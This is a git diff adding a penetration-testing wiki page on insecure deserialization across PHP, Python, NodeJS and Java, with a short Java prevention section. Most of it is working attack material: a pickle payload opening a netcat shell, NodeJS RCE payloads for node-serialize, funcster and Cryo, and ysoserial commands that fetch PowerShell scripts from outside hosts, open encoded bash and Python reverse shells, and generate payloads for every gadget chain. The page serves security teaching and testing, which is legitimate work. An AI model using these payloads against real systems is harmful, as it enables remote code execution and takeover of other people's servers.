diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md
new file mode 100644
index 00000000..a9a4b668
--- /dev/null
+++ b/pentesting-web/deserialization/README.md
@@ -0,0 +1,724 @@
+# Deserialization
+
+**Serialization** is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications.
+
+**Deserialization** is the reverse of that process, taking data structured from some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.
+
+In many occasions you can find some code in the server side that unserialize some object given by the user.  
+In this case, you can send a malicious payload to make the server side behave unexpectedly.
+
+**You should read:** [**https://cheatsheetseries.owasp.org/cheatsheets/Deserialization\_Cheat\_Sheet.html**](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) **for learn how to attack.**
+
+## PHP
+
+Magic method used with serialization:
+
+* `__sleep` is called when an object is serialized and must be returned to array
+
+Magic method used with deserialization
+
+* `__wakeup` is called when an object is deserialized. 
+* `__destruct` is called when PHP script end and object is destroyed. 
+* `__toString` uses object as string but also can be used to read file or more than that based on function call inside it.
+
+```php
+<?php
+class test {
+    public $s = "This is a test";
+    public function displaystring(){
+        echo $this->s.'<br />';
+    }
+    public function __toString()
+    {
+        echo '__toString method called';
+    }
+    public function __construct(){
+        echo "__construct method called";
+    }
+    public function __destruct(){
+        echo "__destruct method called";
+    }
+    public function __wakeup(){
+        echo "__wakeup method called";
+    }
+    public function __sleep(){
+        echo "__sleep method called";
+        return array("s"); #The "s" makes references to the public attribute
+    }
+}
+
+$o = new test();
+$o->displaystring();
+$ser=serialize($o);
+echo $ser;
+$unser=unserialize($ser);
+$unser->displaystring();
+
+/*
+php > $o = new test();
+__construct method called__destruct method called
+php > $o->displaystring();
+This is a test<br />
+php > $ser=serialize($o);
+__sleep method called
+php > echo $ser;
+O:4:"test":1:{s:1:"s";s:14:"This is a test";}
+php > $unser=unserialize($ser);
+__wakeup method called__destruct method called
+php > $unser->displaystring();
+This is a test<br />
+*/
+?>
+```
+
+If you look to the results you can see that the functions `__wakeup` and `__destruct` are called when the object is deserialized. Note that in several tutorials you will find that the `__toString` function is called when trying yo print some attribute, but apparently that's **not happening anymore**.
+
+[**Autoload Classes**](https://www.php.net/manual/en/language.oop5.autoload.php) may also be **dangerous**.
+
+You can read an explained **PHP example here**: [https://www.notsosecure.com/remote-code-execution-via-php-unserialize/](https://www.notsosecure.com/remote-code-execution-via-php-unserialize/), here [https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) or here [https://securitycafe.ro/2015/01/05/understanding-php-object-injection/](https://securitycafe.ro/2015/01/05/understanding-php-object-injection/)
+
+## Python
+
+### **Pickle**
+
+When the object gets unpickle, the function _\_\_reduce\_\__ will be executed.  
+When exploited, server could return an error.
+
+```python
+import cPickle, os, base64
+class P(object):
+    def __reduce__(self):
+        return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
+print(base64.b64encode(cPickle.dumps(P())))
+```
+
+## NodeJS
+
+### [node-serialize](https://www.npmjs.com/package/node-serialize)
+
+This library allows to serialise functions. Example:
+
+```javascript
+var y = {
+ "rce": function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })},
+}
+var serialize = require('node-serialize');
+var payload_serialized = serialize.serialize(y);
+console.log("Serialized: \n" + payload_serialized);
+```
+
+The **serialised object** will looks like:
+
+```bash
+{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}
+```
+
+You can see in the example that when a function is serialized the `_$$ND_FUNC$$_` flag is appended to the serialized object.
+
+Inside the file `node-serialize/lib/serialize.js` you can find the same flag and how the code is using it.
+
+![](../../.gitbook/assets/image%20%2898%29.png)
+
+![](../../.gitbook/assets/image%20%2891%29.png)
+
+As you may see in the last chunk of code, **if the flag is found** `eval` is used to deserialize the function, so basically **user input if being used inside the `eval` function**.
+
+However, **just serialising** a function **won't execute it** as it would be necessary that some part of the code is **calling `y.rce`** in our example and that's highly **unlikable**.  
+Anyway, you could just **modify the serialised object** **adding some parenthesis** in order to auto execute the serialized function when the object is deserialized.  
+In the next chunk of code **notice the last parenthesis** and how the `unserialize` function will automatically execute the code:
+
+```javascript
+var serialize = require('node-serialize');
+var test = {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"};
+serialize.unserialize(test);
+```
+
+As it was previously indicated, this library will get the code after`_$$ND_FUNC$$_` and will **execute it** using `eval`. Therefore, in order to **auto-execute code** you can **delete the function creation** part and the last parenthesis and **just execute a JS oneliner** like in the following example:
+
+```javascript
+var serialize = require('node-serialize');
+var test = '{"rce":"_$$ND_FUNC$$_require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) })"}';
+serialize.unserialize(test);
+```
+
+You can ****[**find here**](https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/) **further information** about how to exploit this vulnerability.
+
+### [funcster](https://www.npmjs.com/package/funcster)
+
+The interesting difference here is that the **standard built-in objects are not accessible**, because they are out of scope. It means that we can execute our code, but cannot call build-in objects’ methods. So if we use `console.log()` or `require(something)`, Node returns an exception like `"ReferenceError: console is not defined"`.
+
+However, we can easily can get back access to everything because we still have access to the global context using something like  `this.constructor.constructor("console.log(1111)")();`:
+
+```javascript
+funcster = require("funcster");
+//Serialization
+var test = funcster.serialize(function() { return "Hello world!" })
+console.log(test) // { __js_function: 'function(){return"Hello world!"}' }
+
+//Deserialization with auto-execution
+var desertest1 = { __js_function: 'function(){return "Hello world!"}()' }
+funcster.deepDeserialize(desertest1)
+var desertest2 = { __js_function: 'this.constructor.constructor("console.log(1111)")()' }
+funcster.deepDeserialize(desertest2)
+var desertest3 = { __js_function: 'this.constructor.constructor("require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });")()' }
+funcster.deepDeserialize(desertest3)
+```
+
+**For**[ **more information read this page**](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)**.**
+
+### \*\*\*\*[**serialize-javascript**](https://www.npmjs.com/package/serialize-javascript)\*\*\*\*
+
+The package **doesn’t include any deserialization functionalit**y and requires you to implement it yourself. Their example uses `eval` directly. This is the official deserialisation example:
+
+```javascript
+function deserialize(serializedJavascript){
+  return eval('(' + serializedJavascript + ')');
+}
+```
+
+If this function is used to deserialize objects you can **easily exploit it**:
+
+```javascript
+var serialize = require('serialize-javascript');
+//Serialization
+var test = serialize(function() { return "Hello world!" });
+console.log(test) //function() { return "Hello world!" }
+
+//Deserialization
+var test = "function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"
+deserialize(test)
+```
+
+### \_\_proto\_\_ abuse
+
+_**\(This information was taken from**_ [_**here**_ ](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)_**and**_ [_**here**_](https://hackerone.com/reports/350418)_**\).**_
+
+**Another way** to achieve code execution is leveraging in **functions** with **attacker’s controlled** data which are **called automatically** **during** the **deserialization** process or after when an application interacts with a newly created object. Something similar to “magic methods” in other languages.
+
+Many packages use the next approach in the deserialization process. They create an empty object and then set its properties using square brackets notations:
+
+```javascript
+obj[key]=value
+```
+
+Secondly, a call of some function leads to the invoking of the function arguments’ methods. For example, when an object is converted to a string, then methods valueOf, toString of the object are called automatically \(more details [here](http://2ality.com/2012/03/converting-to-string.html)\). So, `console.log(obj)` leads to invocation of `obj.toString()`. Another example, `JSON.stringify(obj)` internally invokes obj.toJSON\(\).
+
+Abusing the  [\_\_proto\_\_ property ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)you can **change the methods of the object**, for example `obj.valueOf` or `obj.toString`. So, if you can modify the `__proto__` property of an object you can modify the behaviour of the object when a method is call: you could make it execute arbitrary code whenever `obj.toString` is called. Keep in mind that the **execution** of several **methods** are very **common**, for example `console.log(obj + "anything")` will execute `obj.toString`, or  `JSON.stringify(obj)` internally invokes `obj.toJSON()`.
+
+I’ve found a nice example – [package Cryo](https://www.npmjs.com/package/cryo), which supports both function serialization and square bracket notation for object reconstruction, but which isn’t vulnerable to IIFE, because it properly manages object \(without using `eval&co`\).
+
+Here a code for serialization and deserialization of an object:
+
+```javascript
+cvar Cryo = require('cryo');
+var obj = {
+testFunc : function() {return 1111;}
+};
+
+var frozen = Cryo.stringify(obj);
+console.log(frozen)
+
+var hydrated = Cryo.parse(frozen);
+console.log(hydrated);
+```
+
+Abusing `__proto__` property to modify the behaviour of the object when calling `toString` and `valueOf` \(Note that you need to modify the **serialized object** from `__proto` to `__proto__`  to abuse the deserialization\):
+
+```javascript
+// Simple deserialization executing a console.log
+var obj = {
+    __proto: {
+        toString: function() {console.log("defconrussia"); return 1111;},
+        valueOf: function() {console.log("defconrussia"); return 2222;}
+    }
+};
+var sertest = Cryo.stringify(obj);
+sertest //'{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function() {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function() {console.log(\\"defconrussia\\"); return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
+
+var destest = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function() {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function() {console.log(\\"defconrussia\\"); return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
+var destestdone = Cryo.parse(destest);
+console.log(destestdone + "anything");
+
+
+// Deserialization with RCE
+var obj = {
+    __proto: {
+        toString: function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); },
+        valueOf: function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }
+    }
+};
+var sertest = Cryo.stringify(obj);
+sertest //'{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function() {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function() {console.log(\\"defconrussia\\"); return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
+
+var destest = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function(){ require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) }); }"},{"contents":{},"value":"_CRYO_FUNCTION_function(){ require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) }); }"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
+var destestdone = Cryo.parse(destest);
+console.log(destestdone + "anything");
+```
+
+## Java - HTTP
+
+The main problem with deserialized objects in Java is that **deserialization callbacks were invoked during deserialization**. This makes possible for an **attacker** to **take advantage of that callbacks** and prepare a payload that abuses the callbacks to **perform malicious actions**.
+
+### Fingerprints
+
+#### White Box
+
+Search inside the code for serialization classes and function. For example, search for classes implementing `Serializable` , the use of `java.io.ObjectInputStream` __or `readObject` __or `readUnshare` functions_._
+
+You should also keep an eye on:
+
+* `XMLdecoder` with external user defined parameters
+* `XStream` with `fromXML` method \(xstream version &lt;= v1.46 is vulnerable to the serialization issue\)
+* `ObjectInputStream` with `readObject`
+* Uses of `readObject`, `readObjectNodData`, `readResolve` or `readExternal`
+* `ObjectInputStream.readUnshared`
+* `Serializable`
+
+#### Black Box
+
+**Fingerprints/Magic Bytes** of **java serialised** objects \(from `ObjectInputStream`\):
+
+* `AC ED 00 05` in Hex
+* `rO0` in Base64
+* `Content-type` header of an HTTP response set to `application/x-java-serialized-object`
+* `1F 8B 08 00`  Hex previously compressed
+* `H4sIA` Base64 previously compressed
+* Web files with extension `.faces` and `faces.ViewState` parameter. If you find this in a wabapp, take a look to the [**post about Java JSF VewState Deserialization**](java-jsf-viewstate-.faces-deserialization.md).
+
+```text
+javax.faces.ViewState=rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s
+```
+
+### Check if vulnerable
+
+If you want to **learn about how does a Java Deserialized exploit work** you should take a look to [**Basic Java Deserialization**](basic-java-deserialization-objectinputstream-readobject.md), [**Java DNS Deserialization**](java-dns-deserialization-and-gadgetprobe.md), and [**CommonsCollection1 Payload**](java-transformers-to-rutime-exec-payload.md).
+
+#### White Box Test
+
+You can check if there is installed any application with known vulnerabilities.
+
+```bash
+find . -iname "*commons*collection*"
+grep -R InvokeTransformer .
+```
+
+You could try to **check all the libraries** known to be vulnerable and that ****[**Ysoserial** ](https://github.com/frohoff/ysoserial)can provide an exploit for. Or you could check the libraries indicated on [Java-Deserialization-Cheat-Sheet](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet#genson-json).  
+You could also use ****[**gadgetinspector**](https://github.com/JackOfMostTrades/gadgetinspector) to search for possible gadget chains that can be exploited.  
+When running **gadgetinspector** \(after building it\) don't care about the tons of warnings/errors that it's going through and let it finish. It will write all the findings under _gadgetinspector/gadget-results/gadget-chains-year-month-day-hore-min.txt_. Please, notice that **gadgetinspector won't create an exploit and it may indicate false positives**.
+
+#### Black Box Test
+
+Using the Burp extension [**gadgetprobe**](java-dns-deserialization-and-gadgetprobe.md) you can identify **which libraries are available** \(and even the versions\). With this information it could be **easier to choose a payload** to exploit the vulnerability.  
+[**Read this to learn more about GadgetProbe**](java-dns-deserialization-and-gadgetprobe.md#gadgetprobe)**.**   
+GadgetProbe is focused on **`ObjectInputStream`** deserializations**.**
+
+Using Burp extension [**Java Deserialization Scanner**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner) you can **identify vulnerable libraries** exploitable with ysoserial and **exploit** them.  
+[**Read this to learn more about Java Deserialization Scanner.**](java-dns-deserialization-and-gadgetprobe.md#java-deserialization-scanner)   
+****Java Deserialization Scanner is focused on **`ObjectInputStream`** deserializations.
+
+You can also use [**Freddy**](https://github.com/nccgroup/freddy) to **detect deserializations** vulnerabilities in **Burp**. This plugin will detect **not only `ObjectInputStream`**related vulnerabilities but **also** vulns from **Json** an **Yml** deserialization libraries. In active mode, it will try to confirm them using sleep or DNS payloads.  
+[**You can find more information about Freddy here.**](https://www.nccgroup.com/us/about-us/newsroom-and-events/blog/2018/june/finding-deserialisation-issues-has-never-been-easier-freddy-the-serialisation-killer/)\*\*\*\*
+
+**Serialization Test**
+
+Not all is about checking if any vulnerable library is used by the server. Sometimes you could be able to **change the data inside the serialized object and bypass some checks** \(maybe grant you admin privileges inside a webapp\).  
+If you find a java serialized object being sent to a web application, **you can use** [**SerializationDumper**](https://github.com/NickstaDB/SerializationDumper) **to print in a more human readable format the serialization object that is sent**. Knowing which data are you sending would be easier to modify it and bypass some checks.
+
+### **Exploit**
+
+#### **ysoserial**
+
+The most well-known tool to exploit HTTP deserializations is ****[**ysoserial**](https://github.com/frohoff/ysoserial) \([**download here**](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar)\).  
+****Note that this tool is **focused** on exploiting **`ObjectInputStream`**.  
+I would **start using the "URLDNS"** payload **before a RCE** payload to test if the injection is possible. Anyway, note that maybe the "URLDNS" payload is not working but other RCE payload is.
+
+```bash
+# PoC to make the application perform a DNS req
+java -jar ysoserial-master-SNAPSHOT.jar URLDNS http://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net > payload
+
+# PoC RCE in Windows
+## Ping
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cmd /c ping -n 5 127.0.0.1' > payload
+## Time, I noticed the response too longer when this was used
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c timeout 5" > payload
+## Create File
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn" > payload
+## DNS request
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"
+## HTTP request (+DNS)
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
+### In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')
+### To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0
+## Reverse Shell
+### Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"
+
+#PoC RCE in Linux
+## Ping
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 5 192.168.1.4" > payload 
+## Time
+### Using wait in bash I didn't notice any difference in the timing of the response
+## Create file
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "touch /tmp/pwn" > payload
+## DNS request
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
+## HTTP request (+DNS)
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net" > payload
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"
+## Reverse shell
+### Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" | base64 -w0
+### Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
+java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"
+
+# Base64 encode payload in base64
+base64 -w0 payload
+```
+
+When creating a payload for **java.lang.Runtime.exec\(\)** you **cannot use special characters** like "&gt;" or "\|" to redirect the output of an execution, "$\(\)" to execute commands or even **pass arguments** to a command separated by **spaces** \(you can do `echo -n "hello world"` but you can't do `python2 -c 'print "Hello world"'`\). In order to encode correctly the payload you could [use this webpage](http://www.jackson-t.ca/runtime-exec-payloads.html).
+
+Feel free to use the next script to create **all the possible code execution** payloads for Windows and Linux and then test them on the vulnerable web page:
+
+```python
+import os
+import base64
+ 
+# You may need to update the payloads
+payloads = ['BeanShell1', 'Clojure', 'CommonsBeanutils1', 'CommonsCollections1', 'CommonsCollections2', 'CommonsCollections3', 'CommonsCollections4', 'CommonsCollections5', 'CommonsCollections6', 'CommonsCollections7', 'Groovy1', 'Hibernate1', 'Hibernate2', 'JBossInterceptors1', 'JRMPClient', 'JSON1', 'JavassistWeld1', 'Jdk7u21', 'MozillaRhino1', 'MozillaRhino2', 'Myfaces1', 'Myfaces2', 'ROME', 'Spring1', 'Spring2', 'Vaadin1', 'Wicket1']
+def generate(name, cmd):
+    for payload in payloads:
+        final = cmd.replace('REPLACE', payload)
+        print 'Generating ' + payload + ' for ' + name + '...'
+        command = os.popen('java -jar ysoserial.jar ' + payload + ' "' + final + '"')
+        result = command.read()
+        command.close()
+        encoded = base64.b64encode(result)
+        if encoded != "":
+            open(name + '_intruder.txt', 'a').write(encoded + '\n')
+ 
+generate('Windows', 'ping -n 1 win.REPLACE.server.local')
+generate('Linux', 'ping -c 1 nix.REPLACE.server.local')
+```
+
+#### serialkillerbypassgadgets
+
+You can **use** [**https://github.com/pwntester/SerialKillerBypassGadgetCollection**](https://github.com/pwntester/SerialKillerBypassGadgetCollection) **along with ysoserial to create more exploits**. More information about this tool in the **slides of the talk** where the tool was presented: [https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next\_slideshow=1](https://es.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class?next_slideshow=1)
+
+#### marshalsec
+
+\*\*\*\*[**marshalsec** ](https://github.com/mbechler/marshalsec)can be used to generate payloads to exploit different **Json** and **Yml** serialization libraries in Java.  
+In order to compile the project I needed to **add** this **dependencies** to `pom.xml`:
+
+```markup
+<dependency>
+		<groupId>javax.activation</groupId>
+		<artifactId>activation</artifactId>
+		<version>1.1.1</version>
+</dependency>
+		
+<dependency>
+		<groupId>com.sun.jndi</groupId>
+		<artifactId>rmiregistry</artifactId>
+		<version>1.2.1</version>
+		<type>pom</type>
+</dependency>
+```
+
+**Install maven**, and **compile** the project:
+
+```bash
+sudo apt-get install maven
+mvn clean package -DskipTests
+```
+
+### Labs
+
+* If you want to test some ysoserial payloads you can **run this webapp**: [https://github.com/hvqzao/java-deserialize-webapp](https://github.com/hvqzao/java-deserialize-webapp)
+* [https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
+
+### Why
+
+Java LOVES sending serialized objects all over the place. For example:
+
+* In **HTTP requests** – Parameters, ViewState, Cookies, you name it.
+* **RMI** – The extensively used Java RMI protocol is 100% based on serialization
+* **RMI over HTTP** – Many Java thick client web apps use this – again 100% serialized objects
+* **JMX** – Again, relies on serialized objects being shot over the wire
+* **Custom Protocols** – Sending an receiving raw Java objects is the norm – which we’ll see in some of the exploits to come
+
+### Prevention
+
+#### Transient objects
+
+A class that implements `Serializable` can implement as `transient` any object inside the class that shouldn't be serializable. For example:
+
+```java
+public class myAccount implements Serializable
+{
+    private transient double profit; // declared transient
+    private transient double margin; // declared transient
+```
+
+#### Avoid Serialization of a class that need to implements Serializable
+
+Some of your application objects may be forced to implement `Serializable` due to their hierarchy. To guarantee that your application objects can't be deserialized, a `readObject()` method should be declared \(with a `final` modifier\) which always throws an exception:
+
+```java
+private final void readObject(ObjectInputStream in) throws java.io.IOException {
+    throw new java.io.IOException("Cannot be deserialized");
+}
+```
+
+#### Check deserialized class before deserializing it
+
+The `java.io.ObjectInputStream` class is used to deserialize objects. It's possible to harden its behavior by subclassing it. This is the best solution if:
+
+* You can change the code that does the deserialization
+* You know what classes you expect to deserialize
+
+The general idea is to override [`ObjectInputStream.html#resolveClass()`](https://docs.oracle.com/javase/7/docs/api/java/io/ObjectInputStream.html#resolveClass%28java.io.ObjectStreamClass%29) in order to restrict which classes are allowed to be deserialized.
+
+Because this call happens before a `readObject()` is called, you can be sure that no deserialization activity will occur unless the type is one that you wish to allow.
+
+A simple example of this shown here, where the the `LookAheadObjectInputStream` class is guaranteed not to deserialize any other type besides the `Bicycle` class:
+
+```java
+public class LookAheadObjectInputStream extends ObjectInputStream {
+
+    public LookAheadObjectInputStream(InputStream inputStream) throws IOException {
+        super(inputStream);
+    }
+
+    /**
+    * Only deserialize instances of our expected Bicycle class
+    */
+    @Override
+    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
+        if (!desc.getName().equals(Bicycle.class.getName())) {
+            throw new InvalidClassException("Unauthorized deserialization attempt", desc.getName());
+        }
+        return super.resolveClass(desc);
+    }
+}
+```
+
+**Harden All java.io.ObjectInputStream Usage with an Agent**
+
+ If you don't own the code or can't wait for a patch, using an agent to weave in hardening to `java.io.ObjectInputStream` is the best solution.  
+Using this approach you can only Blacklist known malicious types and not whitelist them as you don't know which object are being serialized.
+
+To enable these agents, simply add a new JVM parameter:
+
+```text
+-javaagent:name-of-agent.jar
+```
+
+Example:  [rO0 by Contrast Security](https://github.com/Contrast-Security-OSS/contrast-rO0)
+
+### References
+
+* Deserialization and ysoserial talk: [http://frohoff.github.io/appseccali-marshalling-pickles/](http://frohoff.github.io/appseccali-marshalling-pickles/)
+* [https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)
+* [https://www.youtube.com/watch?v=VviY3O-euVQ](https://www.youtube.com/watch?v=VviY3O-euVQ)
+* Talk about gadgetinspector: [https://www.youtube.com/watch?v=wPbW6zQ52w8](https://www.youtube.com/watch?v=wPbW6zQ52w8) and slides: [https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf](https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf)
+* Marshalsec paper: [https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true](https://www.github.com/mbechler/marshalsec/blob/master/marshalsec.pdf?raw=true)
+* [https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr](https://dzone.com/articles/why-runtime-compartmentalization-is-the-most-compr)
+* [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
+* [https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html](https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html)
+* Java and .Net JSON deserialization **paper:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** talk: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) and slides: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+* Deserialziations CVEs: [https://paper.seebug.org/123/](https://paper.seebug.org/123/)
+
+## JMS - Java Message Service
+
+> The **Java Message Service** \(**JMS**\) API is a Java message-oriented middleware API for sending messages between two or more clients. It is an implementation to handle the producer–consumer problem. JMS is a part of the Java Platform, Enterprise Edition \(Java EE\), and was defined by a specification developed at Sun Microsystems, but which has since been guided by the Java Community Process. It is a messaging standard that allows application components based on Java EE to create, send, receive, and read messages. It allows the communication between different components of a distributed application to be loosely coupled, reliable, and asynchronous. \(From [Wikipedia](https://en.wikipedia.org/wiki/Java_Message_Service)\).
+
+### Products
+
+There are several products using this middleware to send messages:
+
+![](../../.gitbook/assets/image%20%28288%29.png)
+
+![](../../.gitbook/assets/image%20%2850%29.png)
+
+### Exploitation
+
+So, basically there are a **bunch of services using JMS on a dangerous way**. Therefore, if you have **enough privileges** to send messages to this services \(usually you will need valid credentials\) you could be able to send **malicious objects serialized that will be deserialized by the consumer/subscriber**.  
+This means that in this exploitation all the **clients that are going to use that message will get infected**.
+
